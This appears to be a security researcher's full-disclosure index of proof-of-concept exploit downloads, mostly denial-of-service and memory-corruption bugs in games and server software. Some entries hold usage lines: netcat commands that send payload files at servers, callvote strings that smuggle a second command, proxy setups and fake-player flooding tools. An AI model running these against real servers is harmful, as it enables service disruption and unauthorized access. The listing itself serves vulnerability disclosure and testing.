Archive of my demonstration code (proof-of-concept) in line with my full-disclosure philosophy and directly related to my advisories section where are also located some other PoC not available here and obviously all the technical details, examples and possible exceptions for the testing of these vulnerabilities.
read here if you don't know how to use my stuff and tips for their recompiling
The executables in the ZIP downloads are protected by password: aluigi
- Call of Duty Modern Warfare 3 <= 1.9.453 Steam SendP2PPacket NULL pointer 0.1 (codmw3null)
Proof-of-concept for the vulnerability disclosed in November 2012 at the Power of Community conference in Seoul.
The issue no longer exist in current 1.9.388110, probably fixed in the game or in Steamworks many years ago.
REVULN paper: Owning Multiplayer Online Games
REVULN video: vimeo.com/440375446
- How to test the Samsung SmartTV DLNA vulnerability found in 2012 (samdlna)
REVULN slides: SmartTV Insecurity
- How to test the Samsung SmartTV DMRND vulnerability found in 2012 (samdmrn)
REVULN slides: SmartTV Insecurity
- Mental Ray Satellite <= 3.11.1.10 buffer-overflow (raysat_bof)
REVULN slides: Owning render farms
-
Proof-of-concept code for REVULN paper: Game Engines: A 0-Day's Tale
- Quake 4 getInfo stack-based overflow (quake4_1)
- Homefront multiple vulnerabilities (homefront_1)
- Sanctum and The Haunted: Hells Reach OutOfMemory/memset (sanctum_haunted_outofmemory)
- CryEngine 3 multiple vulnerabilities 0.1 (tested May 2013) (cryengine3_1)
- Brink <= 1.0.23692.48133 multiple vulnerabilities 0.1 (brink_1)
- Breach <= 1.1.0.-1 multiple vulnerabilities 0.1 (breach_1)
- Monday Night Combat array overflow (mnc_1)
- Quake 4 getInfo stack-based overflow (quake4_1)
- Steam Client Service IPC sender PoC 0.1 (steam_service_poc)
REVULN research: Steam Service Security
- Steam voip multiple vulnerabilities 0.1 (steamclient.dll 2.25.32.45) (steamute)
REVULN research: Steam Voip Security
- xArrow <= 3.2 multiple vulnerabilities 0.1 (xarrow_1)
- Vulnerabilities in Novell GroupWise Messenger <= 2.1.0 (nmma_x)
- Serv-U FTP <= 11.1.0.3 possible management console access 0.1 (servu_1b)
- Siemens Automation License Manager <= 500.0.122.1 vulnerabilities 0.1 (almsrvx_1)
- VisualTrader OpenVT lame Denial of Service (openvt_dos)
- proof-of-concept for MetaStock 11 (metastock_1)
- proof-of-concept for the vulnerabilities in eSignal 10.6.2425 (esignal_1)
- Winamp <= 5.61 in_midi multiple vulnerabilities (winamp_3)
- Winamp <= 5.61 multiple vulnerabilities (winamp_2)
- Quest NetVault SmartDisk <= 1.2.1 integer overflow 0.1 (percolator_1)
- proof-of-concept for the stack overflow in Microsoft HTML Help 6.1 (chm_1)
- GenBroker <= 9.21.201.01 multiple integer overflows 0.1 (genesis_iof)
- GenBroker <= 9.21.201.01 multiple memory free vulnerabilities 0.1 (genesis_1)
- FactoryLink <= 8.0.1.1473 multiple vulnerabilities 0.1 (factorylink_x)
- UniData unirpcd.exe <= 7.2.7.3806 vulnerabilities 0.1 (unirpcd_1)
- solidDB <= 6.5.0.3 Denial of Service 0.1 (soliddb_1)
- Winamp <= 5.5.8.2985 multiple buffer-overflows (winamp_1)
- F.E.A.R <= 1.08 and Project Origin <= 1.05 memory corruption 0.1 (fearless)
- Freeciv <= 2.2.1 Denials of Service 0.1 (freecivet)
- Qt <= 4.6.3 QSslSocket endless loop 0.1 (qtsslame)
- Mumble server <= 1.2.3 SQLite error 0.1 (mumbleed)
- America's Army 3 <= 3.0.7 vulnerabilities 0.1 (aa3again)
- id Tech 4 engine client array overflow (idtech4carray)
- Enemy Territory Quake Wars <= 1.5 invalid URL buffer-overflow 0.1a (etqwcbof)
- Chrome Engine 4 Denial of Service 0.1 (chromerda)
- TeamSpeak 3 <= 3.0.0-beta23 multiple vulnerabilities 0.1 (teamspeakrack)
- Battlefield 2 (1.41 - 1.1.2965-797) / 2142 (1.50 - 1.10.48.0) endless loop 0.2 (bf2loop)
proof-of-concept I wrote (and fixed) one year ago based on the vulnerability found by Francis Lavoie-Renaud (info here
the same proof-of-concept tests also the bf2null vulnerability affecting the versions of the games patched versus bf2loop
- GEM engines multiple vulnerabilities 0.1 (gembugs)
- Torque game engine invalid memory access 0.1a (torqueer)
- Alien vs Predator <= 2.22 multiple vulnerabilities 0.1.1a (avp3dos)
- Star Trek DAC DoS (stduck)
nc SERVER 2000 -u < stduck.dat
- X-Motor <= 1.26 buffer-overflow and exceptions 0.1 (xmotorbof)
- NetKar <= 1.1 (1.0.3) buffer-overflow and NULL pointer 0.1 (netkarbof)
- Ventrilo <= 3.0.5 voice packet memset overflow 0.1 (ventrilomemset)
- Ventrilo <= 3.0.5 Speex packet access violation 0.1 (ventspeex)
- Source engine (build 3933) fragments memory corruption (sudppipe/proxocket plugin) 0.2 (sourcefraghof)
- Source engine (build 3698) fragments memory corruption (LAN test) 0.1 (sourcefraghoflan)
- Source engine (build 3933) file uploading vulnerabilities (sudppipe/proxocket plugin) 0.2 (sourceupfile)
- Source engine (build 3698) file uploading vulnerabilities (LAN test) 0.1 (sourceupfilelan)
- Source engine (build 3933) NULL pointer with SourceTV disabled (sudppipe/proxocket plugin) 0.2 (sourcenotvnull)
- Source engine (build 3933) format string (sudppipe/proxocket plugin) 0.2a (sourcefs)
- Source engine (build 3698) format string (LAN test) 0.1.1 (sourcefslan)
- Sniper Elite <= 1.0 multiple NULL pointers 0.1 (snipernull)
- Source engine (build 3939) entity NULL pointer 0.2c (sourcenullentity)
proof-of-concept for a NULL pointer in the latest version of the Source engine (tested build 3939) reported by Nowayz and the Garry's mod community.
the bug is caused by the sending of some commands before joining the match: npc_speakall, npc_ammo_deplete, npc_heal, npc_thinknow, physics_debug_entity, physics_select, wc_update_entity.
other details of the bug are explained in this discussion.
- Vietcong 2 <= 1.10 format string 0.1 (vietcong2fs)
- PunkBuster <= 9 Aug 2009 in-game messages Denial of Service 0.1 (pbmsgsdos2)
- PunkBuster for Soldier of Fortune II <= 1.728 buffer-overflow 0.1 (sof2pbbof)
- TrackMania Forever <= 2.11.19 clients NULL pointer 0.1 (tmnullever)
- TrackMania Forever <= v2009-08-01 unbannable clients and bell bug 0.1 (tmbellban)
- TrackMania Forever <= v2009-05-25 multiple vulnerabilities 0.1a (tm4never)
- S.T.A.L.K.E.R. Clear Sky <= 1.5.10 buffer-overflow 0.1 (stalkerbof)
- S.T.A.L.K.E.R. Clear Sky <= 1.5.10 malloc exception 0.1 (stalkazz)
- S.T.A.L.K.E.R. Clear Sky <= 1.5.10 unhandled exception 0.1 (dirtysky)
- Crysis <= 1.21 and Crysis Wars/Warhead <= 1.5 format string 0.1 (crysisfs)
- ArmA <= 1.14 and ArmA 2 <= 1.02 VON negative memcpy 0.1 (armadioz)
- ArmA <= 1.14 and ArmA 2 <= 1.02 format string 0.1b (armazzofs)
- ArmA <= 1.14 and ArmA 2 <= 1.02 memory bug 0.1b (armazzo)
- World in Conflict <= 1.0.1.1 wrong type assert 0.1 (wicass2)
- America's Army 3 <= 3.0.5 negative memset overflow 0.1 (aa3memset)
- America's Army 3 <= 3.0.5 query NULL pointer and access violation 0.1a (aa3pwood)
- TeamViewer host <= 4.0.5543 resources consumption 0.1 (teamvieweird)
notes: the server must have the "Accept KeepAlive sessions" option enabled (it's automatically activated if "Enable DirectIn Performance optimization" is selected), then note that the default tcp port seems to be 5938 and not 5939.
- Quake 3 engine Cbuf_Execute commands execution universal proof-of-concept 0.1 (q3cbufexec)
universal patcher which gets the original client executable of a game based on the Quake 3 engine and generates a new modified one which converts the ';' chars in the commands sent by the client to carriage-returns for testing a vulnerability which allows to execute server's game commands through a malformed callvote.
details of the vulnerability are available here and here.
examples of malformed callvote commands to use from the console of the modified game executable:
/callvote map "none;rconpassword empty"
/callvote timelimit "123;rconpassword none"
- q3unban plugin for proxocket 0.1 (q3unban_proxocket)
read the q3unban_proxocket.txt file inside the package.
- Unreal engine basic client and Fake Players DoS (unrealfp)
this is a fake players PoC which can be used to test various vulnerabilities in the Unreal engine or in some specific games which use it
- Server termination in Unreal engine 3 0.1.1 (ut3sticle)
Unreal Tournament 3 <= 1.3, Frontlines: Fuel of War <= 1.1.1, America's Army 3 <= 3.0.5 and others
- Clients format strings in the Unreal engine (unrealcfs)
- Ventrilo <= 3.0.2 NULL pointer 0.1 (ventrilobotomy)
- Skulltag <= 0.97d2-RC3 NULL pointer 0.1 (skulltagod)
- Halo <= 1.0.7.615 (before 30 Jul 2008) endless loop 0.1 (haloloop3)
- Halo <= 1.07.615 (before 30 Jul 2008) resources consumption 0.1 (halonso)
- America's Army <= 2.8.3.1 server termination 0.1 (armynchia)
- Unreal Tournament 3 <= 1.2/1.3beta4 memory corruption and NULL pointer 0.1a (ut3mendo)
works also with America's Army 3.0.5.
- Unreal Tournament 2004 <= v3369 NULL pointer 0.1.1 (ut2004null)
- Denial of Service in Warpath and Pariah through DISABLESPLIT (warpariahdos)
- ZDaemon <= 1.08.07 NULL pointer 0.1 (zdaemonull)
- Format string bug in the old versions of the Unreal engine (unrfs)
- Hell bell bug in the Unreal engine through the BADBOY command (unrhellbell)
- Two server bugs in old versions of the Unreal engine (unroldcrash)
- Soldner <= 33724 endless loop 0.1 (usurdat)
- Halo <= 1.07 endless loop 0.1.1a (haloloop2)
- S.T.A.L.K.E.R. <= 1.0006 multiple vulnerabilities 0.1 (stalker39x)
- Some bugs in SunAge <= 1.08.1 0.1 (sunagex)
- Double Denial of Service in Call of Duty 4 1.7 (cod4vamap)
- World in Conflict <= 1.008 NULL pointer 0.1 (wicboom)
- Skulltag <= v0.97D2-RC2 packet parsing DoS (skulltagloop)
- S.T.A.L.K.E.R. <= 1.0006 Denial of Service 0.1 (stalkerboom)
- Crysis <= 1.21 network logs disclosure 0.1 (crysislog)
- Call of Duty 4 <= 1.5 stats in-game Denial of Service 0.1 (sudppipe) (cod4statz_sudp)
requires the sudppipe proxy to work:
sudppipe -l cod4statz_sudp.dll SERVER PORT 20000
then from the CoD4 client type: connect 127.0.0.1:20000
- Call of Duty 4 <= 1.5 stats in-game Denial of Service 0.1 (cod4statz)
stand-alone proof-of-concept, works in LAN and versus servers which don't require authorization
- eTrust Secure Content Manager (eCSqdmn) <= 8.0.28000.511 Denial of Service 0.1 (ecsqdamn)
- CA ARCserve Backup <= 12.0.5454.0 invalid memory access 0.1 (carcbackazz)
- HP LoadRunner <= 9.10 Web Tours upload directory traversal 0.1a (willycoyote)
- HP OpenView Network Node Manager <= 7.53 memory corruption 0.1.1 (closedview)
- solidDB <= 06.00.1018 multiple vulnerabilities 0.1 (soliduro)
- LANDesk Classroom Manager / LanSchool <= 7.0.3.5 fun and bugs 0.1.1 (classdoom)
the students have full control (everything which can be made by the teacher, but this PoC doesn't implement all them) over the other students PCs and can disable and crash the program too
- xine-lib <= 1.1.11 multiple heap overflows 0.1 (xinehof)
- McAfee Framework <= 3.6.0.569 (ePolicy Orchestrator 4.0) format string 0.1 (meccaffi)
- Timbuktu Pro <= 8.6.5 [RC 229] vulnerabilities 0.1 (timbuto)
- MailEnable Professional/Enterprise <= 3.1.3 IMAP multiple vulnerabilities 0.1 (maildisable)
- Perforce Server <= 2007.3/143793 multiple vulnerabilities 0.1 (perforces)
- Versant server <= 7.0.1.3 arbitrary commands execution 0.1 (versantcmd)
- Borland VisiBroker Smart Agent <= 08.00.00.C1.03 heap overflow 0.1 (visibroken)
- Borland StarTeam MPX <= 6.7 deserialization vulnerabilities 0.1 (starteammpx)
- Borland StarTeam <= 10.0.0.57 multiple post-auth integer overflows 0.1 (starteamz)
- Small Denial of Service in MobiLink Listener <= 10.0.1.3629 (dblsndos)
- Buffer-overflow in the passwords handling of Trend Micro OfficeScan 8.0 (officescaz)
- SurgeMail <= 38k4 multiple vulnerabilities 0.1 (surgemailz)
- SIDVault <= 2.0f "+" strstr Denial of Service 0.1 (sidfault)
- Double-Take <= 5.0.0.2865 multiple vulnerabilities 0.1 (doubletakedown)
- Zilab Remote Console Server <= 3.2.9 Denial of Service 0.1 (zilabzrcsdos)
- Zilab Chat and Instant Messaging <= 2.1 multiple vulnerabilities 0.1 (zilabzcsx)
- Sybase MobiLink <= 10.0.1.3629 heap overflow 0.1 (mobilinkhof)
- NowSMS <= v2007.06.27 multiple buffer-overflow 0.1 (nowsmsz)
- FreeSSHD <= 1.20 NULL pointer crash 0.1 (freesshdnull)
- WAC Server <= 2.0 Build 3503 double heap overflow 0.1 (wachof)
- ProSSHD <= 1.0 20070707 resources eater 0.1 (prosshddos)
after about 120 malformed connections the server no longer accepts new connections
- RPM Remote Print Manager <= 4.5.1.11 unicode buffer-overflow 0.1 (rpmlpdbof)
- Format string and crash in CyanSoftware print servers 0.1 (cyanuro)
- ExtremeZ-IP File and Printer Server <= 5.1.2x15 multiple vulnerabilities 0.1 (ezipirla)
- Ipswitch Instant Messaging <= 2.0.8.1 multiple vulnerabilities 0.1 (ipsimene)
- TinTin++ <= 1.97.9 chat vulnerabilities 0.1 (rintintin)
- Wincom LPD <= 3.0.2.623 multiple vulnerabilities 0.1 (wincomalpd)
- SAPlpd <= 6.28 multiple vulnerabilities 0.1 (saplpdz)
- BitTorrent <= 6.0.1 (build 7859) and uTorrent <= 1.7.6 (build 7859) webui crash 0.1 (ruttorrent2)
- BitTorrent <= 6.0 (build 5535) and uTorrent <= 1.7.5 (build 4602) Peers info GUI unicode overflow 0.1 (ruttorrent)
- Quicktime Player <= 7.3.1.70 HTTP error message buffer-overflow 0.1 (quicktimebof)
full proof-of-concept which can be transformed in a code execution exploit simply passing the offset, the return address and the shellcode you want
all the info are available at runtime
- Buffer-overflow in Quicktime Player 7.3.1.70 (quicktimebof)
the first and more basic proof-of-concept for testing this vulnerability:
nc -l -p 80 -v -v -n < quicktimebof.txt
QuickTimePlayer.exe rtsp://127.0.0.1/file.mp3
- SAP MaxDB <= 7.6.03.07 remote command execution 0.1.1 (sapone)
- xtacacsd <= 4.1.2 report() buffer-overflow 0.1 (xtacacsdz)
- mySQL <= 6.0.4 (yaSSL <= 1.7.5) pre-auth buffer-overflow 0.1 (mysqlo)
- yaSSL <= 1.7.5 multiple vulnerabilities 0.1 (yasslick)
- Georgia SoftWorks SSH2 Server <= 7.01.0003 multiple vulnerabilities 0.1 (gswsshit)
- Buffer-overflow and format string in White_Dune 0.29beta791 (whitedunboffs)
- Pragma FortressSSH <= 5.0.4.293 Denial of Service 0.1.1 (pragmassh)
- Pragma TelnetServer <= 7.0.4.589 Denial of Service 0.1 (pragmatel)
- Seattle Lab Telnet Server <= 4.1.1.3758 exception message 0.1 (slnetmsg)
- VanDyke VShell <= 3.0.3-569 exception message 0.2 (vshellmsg)
- Extended Module Player <= 2.5.1 buffer-overflow 0.1 (xmpbof)
- Multiple vulnerabilities in libnemesi 0.6.4-rc1 (libnemesibof)
- Multiple vulnerabilities in Feng 0.1.15 (fengulo)
- Unicode buffer-overflow in Zoom Player <= 6.00b2 (zoomprayer)
- Buffer-overflow and format string in VideoLAN VLC 0.8.6d (vlcboffs)
- WinUAE <= 1.4.4 gunzip buffer-overflow 0.1 (winuaebof)
- id3lib (devel CVS) array overflow 0.1 (id3libexec)
- Pro-Wizard <= 1.62 multiple buffer-overflow 0.1 (prowizbof)
- PeerCast <= 0.1217 heap-overflow 0.1 (peercasthof)
- DOSBox <= 0.72 filesystem access 0.1 (dosboxxx)
- Easy File Sharing 4.5 upload directory traversal 0.1a (efsup)
- Multiple vulnerabilities in Firefly Media Server (mt-daapd) 2.4.1 / SVN 1699 (fireflyz)
some files to send with netcat for testing the vulnerabilities
- I Hear U <= 0.5.6 Denial of Service 0.1 (ihudos)
- Rigs of Rods <= 0.33d global dbuffer buffer-overflow 0.1 (rorbof)
- LIVE555 Media Server <= 2007.11.01 parseRTSPRequestString DoS 0.1 (live555x)
- q3unban plugin for sudppipe 0.1.2 (q3unban_sudp)
plugin for my Simple UDP proxy/pipe:
sudppipe -l q3unban_sudp.dll IP PORT 1234
then from the console of the game type: connect 127.0.0.1:1234
- World in Conflict <= 1.001 "assert" denial of service 0.1 (wicassert)
- Banned clients can join the servers which use the Quake 3 engine 0.1 (q3unban)
NOTE: this PoC is experimental since is not the best way for testing the bug
if you use the cl_anonymous method remember to set it to default (0) when you finish
- q3cfilevar proof-of-concept for Quake 3 1.32c Windows 0.1 (q3cfilevar_132c)
copy the content of the zip in the folder of Quake 3, launch the q3cfilevar_132c.lpatch file with Lpatch and follow the information on the screen
- q3cbof proof-of-concept for Quake 3 1.32c Windows 0.1 (q3cbof_132c)
- q3cbof proof-of-concept for Quake 3 1.32 Windows 0.1 (q3cbof_132)
- Live for Speed demo/S1/S2 <= 0.5X10 clients buffer-overflow 0.1 (lfscbof)
- Dropteam <= 1.3.3 multiple vulnerabilities 0.1 (dropteamz)
- Doom 3 engine format string exploitation through Punkbuster 0.1 (d3engfspb)
Doom 3 <= 1.3.1, Quake 4 <= 1.4.2 and Prey <= 1.3
- F.E.A.R. <= 1.08 format string exploitation through Punkbuster 0.1 (fearfspb)
- America's Army <= 2.8.2 unexploitable buffer-overflow through Punkbuster 0.1 (aaboompb)
- gMotor2 engine multiple vulnerabilities 0.1 (gmotor2)
- OpenTTD <= 0.5.3-RC3 server termination 0.1 (openttdy)
this bug has been found indipendently by me as a remote exploitation (in-game) but it was fixed in revision 10566 about two months ago
- Mumble <= 1.0.0 clients crash/freeze 0.1 (mumblez)
the first bug has been found and fixed by the same author in revision 700 (I found it indipendently) while the other one has been found by me and is caused by the QT library
- CellFactor Revolution <= 1.03 format string and buffer-overflow 0.1 (cellfucktor)
- Alien Arena 2007 <= 6.10 format string and clients disconnection 0.1.2 (aa2k7x)
- Savage <= build 2 oct 2006 bugs 0.1 (savagex)
- Doomsday <= 1.9.0-beta5.1 multiple vulnerabilities 0.1.1 (dumsdei)
- Skulltag <= 0.97d-beta4.1 heap overflow 0.1.1 (skulltaghof)
another way to test this bug should be through: udpsz -s -l 50 127.0.0.1 10666 8000
- Soldat <= 1.4.2/2.6.2 multiple DoS 0.1 (soldatdos)
- Asura engine (network SDK) in-game buffer-overflow 0.1 (asurabof)
works versus both Rogue Trooper and Prism: Guard Shield
- Unreal engine <= Aug 2007 web admin DoS 0.1 (unrwebdos)
- Toribash <= 2.71 multiple vulnerabilities 0.1 (toribashish)
- rFactor <= 1.250 multiple vulnerabilities 0.1 (rfactorx)
- Quake 3 engine directory traversal PoC 0.2.2 (q3dirtrav)
universal proof-of-concept for the bug found by Ludwig and Thilo over one year ago which allows an external attacker to download server.cfg or any other file from a vulnerable server with sv_allowdownload enabled
- Live for Speed Fake Players DoS (lfsfp)
contains 4 options for testing the vulnerabilities I found in LFS 0.5X10
- Babo Violent 2 <= 2.08.00 multiple vulnerabilities 0.1 (bv2x)
- Zoidcom <= 0.6.7 crash 0.1 (zoidboom2)
- Half-Life fake players bug (no auth) (hlfill)
implements the hlfreeze/hl-headnut/csdos/Born_to_be_pig attacks
use "-p 1 -r steam" or "-p 4 -r valve" for Steam and Valve authenticated servers
- Half-Life engine remote server/client crash 0.2.1 (hlboom)
Steam before 07 July 2004 and any WON version
- Pulseaudio <= 0.9.5 (rev 1437) termination 0.1 (pulsex)
- Network Audio System <= 1.8a (svn 231) multiple vulnerabilities 0.1 (nasbugs)
- Netrek server <= 2.12.0 format string bug 0.1a (netrekfs)
- Marathon Aleph One <= 16 Dec 2006 remote server crash 0.1 (alephonz)
- Multiple buffer-overflows in libmusicbrainz <= 2.1.2 (brainzbof)
- Multiple buffer-overflows in AlsaPlayer <= 0.99.76 (alsapbof)
- OpenMPT <= 1.17.02.43 and SVN <= 157 stack and heap overflows 0.1 (mptho)
- Aqualung <= 0.9beta5 (CVS 0.193.2) vendor's tag buffer-overflow (aquabof.flac)
- Festalon 0.5.0-0.5.5 heap corruption 0.1 (festahc)
- DConnect Daemon <= 0.7.0 and CVS 30 Jul 2006 multiple vulnerabilities 0.1 (dconnx)
- Open Cubic Player <= 2.6.0pre6 / 0.1.10_rc5 multiple vulnerabilities 0.1 (ocpbof)
- BomberClone <= 0.11.6 bugs 0.1 (bcloneboom)
- libmikmod <= 3.2.2 and current CVS heap overflow with GT2 files 0.1 (lmmgt2ho)
- Cheesetracker <= 0.9.9 possible code execution 0.1 (cheesebof)
- Dumb <= 0.9.3 (CVS 16 Jul 2006) heap overflow in it_read_envelope 0.1 (dumbit)
- Kaillera <= 0.86 possible code execution 0.1 (kailleraex)
- Proof-of-concept for the buffer-overflow in the WebTool service of Punkbuster for servers (minor than v1.229) (pbwebbof)
- NetPanzer <= 0.8 (rev 952) frameNum bug 0.1 (panza)
- Proof-of-concept builder for the ASF and QT heap overflow in libextractor <= 0.5.13 (rev 2832) (libextho)
- Outgun <= 1.0.3 (bot 2) multiple vulnerabilities 0.1 (outgunx)
- Empire <= 4.3.2 crash 0.1 (empiredos)
- Genecys <= 0.2 buffer-overflow and NULL pointer crash 0.1 (genecysbof)
- Raydium <= SVN 309 multiple vulnerabilities 0.1 (raydiumx)
- Skulltag <= 0.96f format string 0.1 (skulltagfs)
- OpenTTD <= 0.4.7 multiple vulnerabilities 0.1 (openttdx)
- dim3 <= 1.5 buffer-overflow bugs 0.1 (dim3bof)
- Ultr@VNC <= 1.0.1 *Log::ReallyPrint buffer-overflow 0.1 (uvncbof)
- Legacy Doom Fake Players DoS 0.1 (legacyfp)
this is a simple fake players tool but causes also the freezing of the players and the subsequent termination of the server 1.42
- Zdaemon <= 1.08.01 buffer-overflow in is_client_wad_ok 0.1 (zdaebof)
- Vavoom <= 1.19.1 multiple vulnerabilities 0.1 (vaboom)
- csDoom <= 0.7 multiple vulnerabilities 0.1 (csdoombof)
- ENet library <= Jul 2005 multiple vulnerabilities 0.1 (enetx)
- GGZ <= 0.0.12 clients disconnector 0.1 (ggzcdos)
- Globulation 2 Fake Players DoS (glob2fp)
this tool is linked also in this section because causes the crash of the servers <= Alpha19 when there are too much players
- Ventrilo Fake Players DoS (ventrilofp)
this tool is linked also in this section because contains some flooding attacks which have some small effects versus clients
- Alien Arena 2006 GE <= 5.00 multiple vulnerabilities 0.1 (aa2k6x)
- Freeciv <= 2.0.7 jumbo malloc crash 0.1 (freecivdos)
- LieroX <= 0.62b multiple vulnerabilities 0.1 (lieroxxx)
- Sauerbraten <= 2006_02_28 multiple vulnerabilities 0.1 (sauerburn)
- Cube <= 2005_08_29 multiple vulnerabilities 0.1 (evilcube)
- Monopd <= 0.9.3 DoS 0.1 (monopdx)
- CrossFire <= 1.8.0 oldsocketmode buffer-overflow 0.1 (crossfirebof)
I have found this bug indipentently in the current version available but it was already patched by the developers in the CVS and later in the 1.9.0 release
- Dual DHCP DNS Server 1.0 buffer-overflow 0.1 (dualsbof)
- BZFlag <= 2.0.4 (2.x) server crash 0.1 (bzflagboom)
- GO-Global for Windows server <= 3.1.0.3270 buffer-overflow 0.1 (ggwbof)
- GO-Global for Windows clients <= 3.1.0.3270 buffer-overflow 0.1 (ggwbofc)
- ASUS Video Security <= 3.5.0.0 HTTP multiple vulnerabilities 0.1 (asusvsbugs)
- Scorched 3D <= 39.1 (bf) multiple vulnerabilities 0.1a (scorchbugs)
- Glider collect'n kill <= 1.0.0.0 buffer-overflow 0.1 (gliderbof)
- FlatFrag <= 0.3 multiple vulnerabilities 0.1 (flatfragz)
- Blitzkrieg 2 <= 1.21 players kicker 0.1 (blitz2out)
- Battle Carry <= .005 socket termination 0.1 (bcarrydos)
- Virtools <= 3.0.0.100 buffer-overflow and directory traversal bugs 0.1 (virtbugs)
- MultiTheftAuto <= 0.5 patch 1 server crash/motd reset 0.1 (mtaboom)
- Universal "Gamespy cd-key in use" executable-2-PoC converter 0.1 (gskeyinuseuni)
modifies 3 bytes of the executable of any game that uses the Gamespy cd-key SDK for converting it in a proof-of-concept which keeps in use all the cd-keys of the gamers which join the server
read the text file inside
- BFCommand & Control login bypass 0.1 (bfccown)
BFCC <= 1.22_A and BFVCC <= 2.14_B
- Ventrilo <= 2.3.0 server crash 0.1 (ventboom)
- Chris Moneymaker's World Poker Championship 1.0 buffer-overflow 0.1 (chmpokbof)
- Netpanzer <= 0.8 endless loop 0.1 (panzone)
- Raknet library <= 2.33 (before 30 May 2005) server termination 0.1 (rakzero)
an example of vulnerable game is Elite Warriors: Vietnam <= 1.03
- Stronghold 2 <= 1.2 server crash 0.1 (strong2boom)
- Terminator 3 War of the Machines <= 1.16 buffer-overflow and crash 0.2.1 (t3wmbof)
- C'Nedra <= 0.4.0 buffer-overflow 0.1 (cnedrabof)
- Halo <= 1.06 endless loop 0.1.1a (haloloop)
- Warrior Kings Battles <= 1.23 format string and crash bugs 0.1 (wkbbugs)
- Warrior Kings <= 1.3 format string bug 0.1 (warkingsfs)
- War Times <= 1.03 in-game server crash 0.1 (wartimesboom)
- Zoidcom <= 1.0 beta 4 crash 0.1 (zoidboom)
- Gamespy cd-key validation: "Cd-key in use" DoS 0.2 (gskeyinuse)
- Gamespy cd-key validation: cd-key never in use 0.1.1a (gskeydisc)
for both *nix and Windows. Is required an OS which supports raw sockets and you must verify that the spoofed packets really reach the target host (root privileges, no firewalls and no other OS limitations)
- Mtp-Target <= 1.2.2 clients format string and server crash 0.1 (mtpbugs)
- IGI 2: Covert Strike <= 1.3 Gamespy cd-key SDK buffer-overflow 0.1 (igi2gsbof)
- IGI 2: Covert Strike <= 1.3 in-game vulnerabilities 0.1 (igi2bugs)
- Yager <= 5.24 multiple vulnerabilities 0.1a (yagerbof)
- Jedi Academy <= 1.011 in-game server buffer-overflow 0.1 (jamsgbof)
script to launch with "/exec jamsgbof" from the client console
- Call of Duty <= 1.5b, United Offensive <= 1.51b and Call of Duty 2 Windows server crash 0.1 (codmsgboom)
script to launch with "/exec codmsgboom" from the client console
- Quake 3 engine in-game players kicking 0.1 (q3msgboom)
script to launch with "/exec q3msgboom" from the client console
- Tincat network library Release 2 < build 28: buffer-overflow 0.1 (tincat2bof)
works versus The Settlers: Heritage of Kings <= 1.02, Sacred <= 1.8.2.6 and others
- FunLabs games multiple Denial of Service 0.1 (funlabsboom)
- Xpand Rally <= 1.1.0.0 in-game format string bug 0.1 (xprallyfs)
- Chaser Fake Players DoS and clients disconnector (chaserfp)
- Carsten's 3D Engine <= March 2004 format string and crash 0.1 (ca3dex)
- Scrapland <= 1.0 server termination 0.1 (scrapboom)
- Soldier of Fortune 2 (1.02, 1.03) cl_guid server crash 0.2 (sof2guidboom)
- TrackerCam <= 5.12 multiple vulnerabilities 0.1 (tcambof)
- Bontago <= 1.1 server buffer-overflow 0.1 (bontagobof)
- Quake 3 engine infostring crash/shutdown scanner 0.1.2 (q3infoboom)
- Armagetron / Armagetron Advanced <= 0.2.7.0 server crash 0.1 (atronboom)
- Armagetron / Armagetron Advanced Fake Player DoS (atronfp)
a fake players able to freeze both server and connected clients of versions <= 0.2.7.0
- Integer overflow in RealArcade 1.2.0.994
- Arbitrary files deletion in RealArcade 1.2.0.994
- Painkiller <= 1.35 in-game cd-key alpha-numeric buffer-overflow 0.1 (painkkeybof)
- Xpand Rally <= 1.0.0.0 server/clients crash 0.1 (xprallyboom)
- Local buffer-overflow in W32Dasm 8.93 (w32dasmbof.disasm_me)
open it with W32Dasm and your return address will be overwritten with 0xdeadc0de (the executable is a simple "void main(void)" compiled with Lcc and with a big imported function name)
- Skin file to test the arbitrary files overwriting in DivX Player <= 2.6 (divxplayerbug)
updated 07 Feb 2005
- Breed <= patch #1 zero-length crash 0.1 (breedzero)
- Amp II engine (Gore <= 1.50) socket unreachable 0.1 (amp2zero)
- SOLDNER Secret Wars <= 30830 socket termination 0.1 (soldnersock)
- Lithtech engine (new protocol) socket unreachable 0.1.1 (lithsock)
Contract Jack <= 1.1, No one lives forever 2 <= 1.3, Tron 2.0 <= 1.042 and F.E.A.R. <= 1.02
- Codename Eagle <= 1.42 socket unreachable 0.1 (ceaglesock)
- Gore <= 1.49 Gamespy cd-key SDK buffer-overflow 0.1 (goregsbof)
- Battlefield broadcast client crash 0.1 (bfcboom)
Battlefield 1942 <= 1.6.19 and Vietnam <= 1.2
- Kreed <= 1.05 format string, message too long and scripts bugs 0.1 (kreedexec)
- Jana Server <= 2.4.4 http/pna DoS 0.1 (janados)
- Orbz <= 2.10 buffer-overflow 0.1 (orbzbof)
- Serious engine Fake Players DoS (ssfakep)
originally a fake players tool but is also able to crash the servers of the Serious engine games using the UDP protocol
- Star Wars Battlefront Fake Players DoS and Tester (swbfp)
a Fake players tool that can be used also to test the security bugs affecting the versions <= 1.11 of the server
- Soldier of Fortune II <= 1.3 server and client crash/stop 0.1 (sof2boom)
- Halo <= 1.05 broadcast client crash 0.1 (halocboom)
- 602 Lan Suite <= 2004.0.04.0909 resources consumption 0.1 (602res)
- Master of Orion III <= 1.2.5 server crash 0.1 (moo3boom)
- Age of Sail II <= 1.04.151 server buffer overflow 0.1 (aos2bof)
- Vypress Tonecast receiver <= 1.3 broadcast crash 0.1 (toneboom)
- ShixxNote 6.net buffer overflow 0.1 (shixxbof)
- \secure\ buffer overflow in some old Monolith games 0.1.1 (lithsec)
Alien versus predator 2, Blood 2, No one lives forever and Shogo
- Flash Messaging <= 5.2.0g (rev 1.1.2) server crash and decoder 0.1 (flashmsg)
A proof-of-concept but also a client emulator to see the decoded data
- VyPress Messenger <= 3.5.1 broadcast buffer-overflow 0.1 (vymesbof)
- Icecast <= 2.0.1 Win32 remote code execution 0.1 (iceexec)
- Chatman <= 1.5.1 RC1 broadcast crash 0.1a (chatmanx)
- Buffer-overflow in Zinf 2.2.1 for Windows through PLS file
- ActivePost File-Server <= 3.1 traversal file uploader 0.1 (actpup)
- ActivePost File-Server <= 3.1 crash 0.1 (actpboom)
- PopMessenger <= 1.60 (20 Sep 2004) remote crash 0.1 (popmsgboom)
- Lords of the Realm III <= 1.01 server crash 0.1 (lotr3boom)
- Pigeon server <= 3.02.0143 freeze 0.1 (pigeonx)
- Halo <= 1.04 remote server crash 0.1 (haloboom)
